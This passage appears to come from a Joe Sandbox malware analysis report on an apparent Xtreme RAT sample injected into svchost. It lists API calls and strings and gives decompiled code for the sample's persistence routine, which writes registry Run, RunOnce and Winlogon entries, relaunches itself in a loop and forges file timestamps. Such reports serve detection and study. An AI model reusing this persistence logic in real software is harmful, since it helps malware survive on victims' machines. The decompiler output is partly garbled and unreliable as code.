Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,002C6790,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

GetLastError.KERNEL32(00000000,00000000,?), ref: 00C8944E
CloseHandle.KERNEL32(00000000), ref: 00C8945B
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C89476
CloseHandle.KERNEL32(00000000), ref: 00C8947E
GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C89497
ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894A5
CloseHandle.KERNEL32(00000000), ref: 00C894AD
Sleep.KERNEL32(00001388,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894B7

Strings

Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00C89186, 00C891B8
shell32.dll, xrefs: 00C88F15
user32.dll, xrefs: 00C88F01
Load, xrefs: 00C89181, 00C891B3
advapi32.dll, xrefs: 00C88F0B
.functions, xrefs: 00C88ED4
kernel32.dll, xrefs: 00C88F29
open, xrefs: 00C8946F
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00C89033, 00C89075
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00C891EC, 00C89214
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 00C89256, 00C8928C
Shell, xrefs: 00C891E7, 00C8920F
restart, xrefs: 00C88FC5
shlwapi.dll, xrefs: 00C88F1F
explorer.exe , xrefs: 00C88FE3
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00C89112, 00C89148
StubPath, xrefs: 00C890B7

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C88EC4, Relevance: 67.0, APIs: 21, Strings: 17, Instructions: 456
librarysleepfileCrypto

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00C88EC4(intOrPtr _a4) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _t92;
				signed int* _t93;
				signed int _t94;
				void* _t106;
				void* _t121;
				void* _t126;
				void* _t161;
				void* _t183;
				void* _t298;
				intOrPtr* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t307;
				void* _t310;
				void* _t324;
				intOrPtr _t329;
				intOrPtr _t332;
				long _t359;
				void* _t361;
				void* _t362;
				intOrPtr _t363;

				 *_t92 =  *_t92 + _t92;
				_t93 = _t92 +  *_t92;
				 *_t93 = _t93 +  *_t93;
				asm("das");
				 *_t93 = _t93 +  *_t93;
				 *((intOrPtr*)(_t93 + _t93)) =  *((intOrPtr*)(_t93 + _t93)) + _t324;
				 *_t93 = _t93 +  *_t93;
				 *[cs:esi] =  *[cs:esi] + _t93;
				if ( *[cs:esi] != 0) goto L2;
				asm("outsb");
				 *_t303 =  *_t303 + _t93;
				if ( *_t303 == 0) goto L3;
				_t94 =  *_t93 * 0x6e006f;
				if (_t94 >= 0) goto L4;
				 *_t94 =  *_t94 + _t94;
				 *_t94 =  *_t94 + _t94;
				asm("outsd");
				 *_t94 =  *_t94 + _t324;
				 *[gs:esi] =  *[gs:esi] + _t306;
				 *_t94 =  *_t94 + _t94;
				 *_t94 =  *_t94 + _t94;
				_t361 = _t362;
				_t363 = _t362 + 0xffffffe8;
				_push(_t303);
				LoadLibraryA("user32.dll"); // executed
				LoadLibraryA("advapi32.dll"); // executed
				LoadLibraryA("shell32.dll"); // executed
				LoadLibraryA("shlwapi.dll");
				LoadLibraryA("kernel32.dll");
				_v8 = 0;
				E00C8263C(0, 0, _a4 + 0x135e); // executed
				_t106 = CreateFileW(_a4 + 0x181c, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t304 = _t106;
				if(_t304 != 0xffffffff) {
					_v20 = GetFileSize(_t304, 0);
					_v16 = 0;
					_t359 = _v20;
					_t298 = VirtualAlloc(0, _t359, 0x1000, 4); // executed
					_v8 = _t298;
					SetFilePointer(_t304, 0, 0, 0); // executed
					ReadFile(_t304, _v8, _t359,  &_v12, 0); // executed
				}
				CloseHandle(_t304);
				_v12 = 0;
				Sleep(0x2710); // executed
				_v24 = E00C833A8(_a4 + 0x181c, L" restart", _a4 + 0x181c);
				_v28 = E00C833A8(L"explorer.exe ", _a4 + 0x181c, _a4 + 0x181c);
				L7:
				while(1) {
					if( *((char*)(_a4 + 0x1258)) != 1) {
						L23:
						if(E00C835B0(_a4 + 0x181c) != 0 || E00C834C4(_a4 + 0x1a26) == 0) {
							L34:
							_t121 = E00C8263C(0, 0, _a4 + 0x1310); // executed
							_t305 = _t121;
							if(GetLastError() == 0xb7) {
								CloseHandle(_t305);
							} else {
								CloseHandle(_t305);
								ShellExecuteW(0, L"open", _a4 + 0x181c, 0, 0, 0); // executed
							}
							_t126 = E00C8263C(0, 0, _a4 + 0x1326); // executed
							_t304 = _t126;
							if(GetLastError() != 0xb7) {
								CloseHandle(_t304);
							} else {
								ExitProcess(0);
							}
							Sleep(0x1388); // executed
							continue;
						} else {
							if(_v16 != 0) {
								if(__eflags <= 0) {
									L30:
									if( *((char*)(_a4 + 0x1235)) != 1) {
										goto L34;
									}
									SetFileAttributesW(_a4 + 0x1a26, 0x80);
									SetFileAttributesW(_a4 + 0x181c, 0x80);
									E00C81248();
									_push(_t361);
									_push(0xc89399);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_push(E00C812A4(0x1b) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xb) + 1);
									_t161 = E00C812A4(6);
									_pop(_t307);
									E00C83BC4(_a4 + 0x1a26, _t304, _t307, _t161 + 0x7d1);
									_pop(_t329);
									 *[fs:eax] = _t329;
									_push(_t361);
									_push(0xc89416);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_push(E00C812A4(0x1b) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xb) + 1);
									_t183 = E00C812A4(6);
									_pop(_t310);
									E00C83BC4(_a4 + 0x181c, _t304, _t310, _t183 + 0x7d1);
									_pop(_t332);
									 *[fs:eax] = _t332;
									E00C83674(_a4 + 0x1a26);
									E00C83674(_a4 + 0x181c);
									goto L34;
								}
								L29:
								E00C83218(_a4 + 0x181c, _v8, _v20, _v16);
								goto L30;
							}
							if(_v20 <= 0) {
								goto L30;
							}
							goto L29;
						}
					}
					if( *((char*)(_a4 + 0x12d8)) == 1) {
						E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48(_a4 + 0x181c) + _t292, 0, _a4 + 0x181c); // executed
					}
					if( *((char*)(_a4 + 0x12d9)) == 1) {
						E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48(_a4 + 0x181c) + _t283, 0, _a4 + 0x181c); // executed
					}
					if( *((char*)(_a4 + 0x12da)) == 1) {
						SHDeleteKeyW(0x80000001, _a4 + 0x1e3a); // executed
						E00C888D0(0x80000002, _a4 + 0x1e3a, 2, E00C82E48(_v24) + _t274, 0, _v24); // executed
					}
					if( *((char*)(_a4 + 0x12f2)) == 1) {
						if( *((char*)(_a4 + 0x12f3)) == 1) {
							E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48(_a4 + 0x181c) + _t255, 0, _a4 + 0x181c);
							E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48(_a4 + 0x181c) + _t264, 0, _a4 + 0x181c);
						}
						if( *((char*)(_a4 + 0x12f4)) == 1) {
							E00C888D0(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48(_a4 + 0x181c) + _t239, 0, _a4 + 0x181c);
							E00C888D0(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48(_a4 + 0x181c) + _t247, 0, _a4 + 0x181c);
						}
						if( *((char*)(_a4 + 0x12f5)) == 1) {
							E00C888D0(0x80000001, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48(_v28) + _t225, 0, _v28);
							E00C888D0(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48(_v28) + _t231, 0, _v28);
						}
						if( *((char*)(_a4 + 0x12f6)) == 1) {
							E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48(_a4 + 0x181c) + _t209, 0, _a4 + 0x181c);
							E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48(_a4 + 0x181c) + _t218, 0, _a4 + 0x181c);
						}
					}
					goto L23;
				}
			}

0x00c88ec6
0x00c88ec8
0x00c88eca
0x00c88ecc
0x00c88ecd
0x00c88ecf
0x00c88ed2
0x00c88ed4
0x00c88ed8
0x00c88eda
0x00c88edb
0x00c88ede
0x00c88ee0
0x00c88ee6
0x00c88ee8
0x00c88eea
0x00c88eec
0x00c88eed
0x00c88ef0
0x00c88ef4
0x00c88ef6
0x00c88ef9
0x00c88efb
0x00c88efe
0x00c88f06
0x00c88f10
0x00c88f1a
0x00c88f24
0x00c88f2e
0x00c88f35
0x00c88f45
0x00c88f62
0x00c88f67
0x00c88f6c
0x00c88f78
0x00c88f7b
0x00c88f85
0x00c88f8b
0x00c88f90
0x00c88f9a
0x00c88fab
0x00c88fab
0x00c88fb1
0x00c88fb8
0x00c88fc0
0x00c88fd7
0x00c88fed
0x00000000
0x00c88ff0
0x00c88ffa
0x00c8929b
0x00c892aa
0x00c8943a
0x00c89447
0x00c8944c
0x00c89458
0x00c8947e
0x00c8945a
0x00c8945b
0x00c89476
0x00c89476
0x00c89490
0x00c89495
0x00c894a1
0x00c894ad
0x00c894a3
0x00c894a5
0x00c894a5
0x00c894b7
0x00000000
0x00c892c5
0x00c892c9
0x00c892d3
0x00c892eb
0x00c892f5
0x00000000
0x00000000
0x00c89309
0x00c8931c
0x00c89321
0x00c89328
0x00c89329
0x00c8932e
0x00c89331
0x00c8933f
0x00c8934b
0x00c89357
0x00c89363
0x00c8936f
0x00c89375
0x00c89389
0x00c8938a
0x00c89391
0x00c89394
0x00c893a5
0x00c893a6
0x00c893ab
0x00c893ae
0x00c893bc
0x00c893c8
0x00c893d4
0x00c893e0
0x00c893ec
0x00c893f2
0x00c89406
0x00c89407
0x00c8940e
0x00c89411
0x00c89428
0x00c89435
0x00000000
0x00c89435
0x00c892d5
0x00c892e6
0x00000000
0x00c892e6
0x00c892cf
0x00000000
0x00000000
0x00000000
0x00c892d1
0x00c892aa
0x00c8900a
0x00c8903d
0x00c8903d
0x00c8904c
0x00c8907f
0x00c8907f
0x00c8908e
0x00c8909e
0x00c890ca
0x00c890ca
0x00c890d9
0x00c890e9
0x00c8911c
0x00c89152
0x00c89152
0x00c89161
0x00c89190
0x00c891c2
0x00c891c2
0x00c891d1
0x00c891f6
0x00c8921e
0x00c8921e
0x00c8922d
0x00c89260
0x00c89296
0x00c89296
0x00c8922d
0x00000000
0x00c890d9

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00C88F06
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88F10
LoadLibraryA.KERNEL32(shell32.dll), ref: 00C88F1A
LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00C88F24
LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C88F2E

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C88F62
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,kernel32.dll,shlwapi.dll,shell32.dll,advapi32.dll), ref: 00C88F71
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?), ref: 00C88F8B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00001000,00000004,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000), ref: 00C88F9A
ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C88FAB
CloseHandle.KERNEL32(00000000), ref: 00C88FB1
Sleep.KERNEL32(00002710,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,kernel32.dll,shlwapi.dll,shell32.dll,advapi32.dll), ref: 00C88FC0

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

SHDeleteKeyW.SHLWAPI(80000001,?), ref: 00C8909E

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89309
SetFileAttributesW.KERNEL32(?,00000080,?,00000080), ref: 00C8931C

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,002C6790,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

GetLastError.KERNEL32(00000000,00000000,?), ref: 00C8944E
CloseHandle.KERNEL32(00000000), ref: 00C8945B
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C89476
CloseHandle.KERNEL32(00000000), ref: 00C8947E
GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C89497
ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894A5
CloseHandle.KERNEL32(00000000), ref: 00C894AD
Sleep.KERNEL32(00001388,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894B7

Strings

Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00C89186, 00C891B8
shell32.dll, xrefs: 00C88F15
user32.dll, xrefs: 00C88F01
Load, xrefs: 00C89181, 00C891B3
advapi32.dll, xrefs: 00C88F0B
.functions, xrefs: 00C88ED4
kernel32.dll, xrefs: 00C88F29
open, xrefs: 00C8946F
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00C89033, 00C89075
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00C891EC, 00C89214
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 00C89256, 00C8928C
Shell, xrefs: 00C891E7, 00C8920F
restart, xrefs: 00C88FC5
shlwapi.dll, xrefs: 00C88F1F
explorer.exe , xrefs: 00C88FE3
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00C89112, 00C89148
StubPath, xrefs: 00C890B7

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8939E, Relevance: 31.9, APIs: 9, Strings: 9, Instructions: 356
sleepCrypto

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00C8939E() {
				void* _t81;
				void* _t86;
				void* _t121;
				void* _t143;
				void* _t257;
				void* _t258;
				void* _t259;
				void* _t262;
				intOrPtr _t278;
				intOrPtr _t281;
				void* _t305;
				intOrPtr _t306;

				E00C814F0();
				while(1) {
					_push(_t305);
					_push(0xc89416);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					_push(E00C812A4(0x1b) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xb) + 1);
					_t143 = E00C812A4(6);
					_pop(_t262);
					E00C83BC4( *((intOrPtr*)(_t305 + 8)) + 0x181c, _t257, _t262, _t143 + 0x7d1);
					_pop(_t281);
					 *[fs:eax] = _t281;
					E00C83674( *((intOrPtr*)(_t305 + 8)) + 0x1a26);
					E00C83674( *((intOrPtr*)(_t305 + 8)) + 0x181c);
					goto L28;
					do {
						do {
							L28:
							_t81 = E00C8263C(0, 0,  *((intOrPtr*)(_t305 + 8)) + 0x1310); // executed
							_t258 = _t81;
							if(GetLastError() == 0xb7) {
								CloseHandle(_t258);
							} else {
								CloseHandle(_t258);
								ShellExecuteW(0, L"open",  *((intOrPtr*)(_t305 + 8)) + 0x181c, 0, 0, 0); // executed
							}
							_t86 = E00C8263C(0, 0,  *((intOrPtr*)(_t305 + 8)) + 0x1326); // executed
							_t257 = _t86;
							if(GetLastError() != 0xb7) {
								CloseHandle(_t257);
							} else {
								ExitProcess(0);
							}
							Sleep(0x1388); // executed
							if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x1258)) == 1) {
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12d8)) == 1) {
									E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t252, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c); // executed
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12d9)) == 1) {
									E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t243, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c); // executed
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12da)) == 1) {
									SHDeleteKeyW(0x80000001,  *((intOrPtr*)(_t305 + 8)) + 0x1e3a); // executed
									E00C888D0(0x80000002,  *((intOrPtr*)(_t305 + 8)) + 0x1e3a, 2, E00C82E48( *((intOrPtr*)(_t305 - 0x14))) + _t234, 0,  *((intOrPtr*)(_t305 - 0x14))); // executed
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f2)) == 1) {
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f3)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t215, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t224, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f4)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t199, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t207, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f5)) == 1) {
										E00C888D0(0x80000001, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48( *((intOrPtr*)(_t305 - 0x18))) + _t185, 0,  *((intOrPtr*)(_t305 - 0x18)));
										E00C888D0(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48( *((intOrPtr*)(_t305 - 0x18))) + _t191, 0,  *((intOrPtr*)(_t305 - 0x18)));
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f6)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t169, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t178, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
								}
							}
						} while (E00C835B0( *((intOrPtr*)(_t305 + 8)) + 0x181c) != 0 || E00C834C4( *((intOrPtr*)(_t305 + 8)) + 0x1a26) == 0);
						if( *((intOrPtr*)(_t305 - 0xc)) != 0) {
							if(__eflags <= 0) {
								goto L24;
							}
							L23:
							E00C83218( *((intOrPtr*)(_t305 + 8)) + 0x181c,  *((intOrPtr*)(_t305 - 4)),  *((intOrPtr*)(_t305 - 0x10)),  *((intOrPtr*)(_t305 - 0xc)));
							goto L24;
						}
						if( *((intOrPtr*)(_t305 - 0x10)) <= 0) {
							goto L24;
						}
						goto L23;
						L24:
					} while ( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x1235)) != 1);
					SetFileAttributesW( *((intOrPtr*)(_t305 + 8)) + 0x1a26, 0x80);
					SetFileAttributesW( *((intOrPtr*)(_t305 + 8)) + 0x181c, 0x80);
					E00C81248();
					_push(_t305);
					_push(0xc89399);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					_push(E00C812A4(0x1b) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xb) + 1);
					_t121 = E00C812A4(6);
					_pop(_t259);
					E00C83BC4( *((intOrPtr*)(_t305 + 8)) + 0x1a26, _t257, _t259, _t121 + 0x7d1);
					_pop(_t278);
					 *[fs:eax] = _t278;
				}
			}

0x00c8939e
0x00c893a3
0x00c893a5
0x00c893a6
0x00c893ab
0x00c893ae
0x00c893bc
0x00c893c8
0x00c893d4
0x00c893e0
0x00c893ec
0x00c893f2
0x00c89406
0x00c89407
0x00c8940e
0x00c89411
0x00c89428
0x00c89435
0x00c89435
0x00c8943a
0x00c8943a
0x00c8943a
0x00c89447
0x00c8944c
0x00c89458
0x00c8947e
0x00c8945a
0x00c8945b
0x00c89476
0x00c89476
0x00c89490
0x00c89495
0x00c894a1
0x00c894ad
0x00c894a3
0x00c894a5
0x00c894a5
0x00c894b7
0x00c88ffa
0x00c8900a
0x00c8903d
0x00c8903d
0x00c8904c
0x00c8907f
0x00c8907f
0x00c8908e
0x00c8909e
0x00c890ca
0x00c890ca
0x00c890d9
0x00c890e9
0x00c8911c
0x00c89152
0x00c89152
0x00c89161
0x00c89190
0x00c891c2
0x00c891c2
0x00c891d1
0x00c891f6
0x00c8921e
0x00c8921e
0x00c8922d
0x00c89260
0x00c89296
0x00c89296
0x00c8922d
0x00c890d9
0x00c892a8
0x00c892c9
0x00c892d3
0x00000000
0x00000000
0x00c892d5
0x00c892e6
0x00000000
0x00c892e6
0x00c892cf
0x00000000
0x00000000
0x00000000
0x00c892eb
0x00c892ee
0x00c89309
0x00c8931c
0x00c89321
0x00c89328
0x00c89329
0x00c8932e
0x00c89331
0x00c8933f
0x00c8934b
0x00c89357
0x00c89363
0x00c8936f
0x00c89375
0x00c89389
0x00c8938a
0x00c89391
0x00c89394
0x00c89394

APIs

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

SHDeleteKeyW.SHLWAPI(80000001,?), ref: 00C8909E

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894A5

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89309
SetFileAttributesW.KERNEL32(?,00000080,?,00000080), ref: 00C8931C

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,002C6790,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

GetLastError.KERNEL32(00000000,00000000,?), ref: 00C8944E
CloseHandle.KERNEL32(00000000), ref: 00C8945B
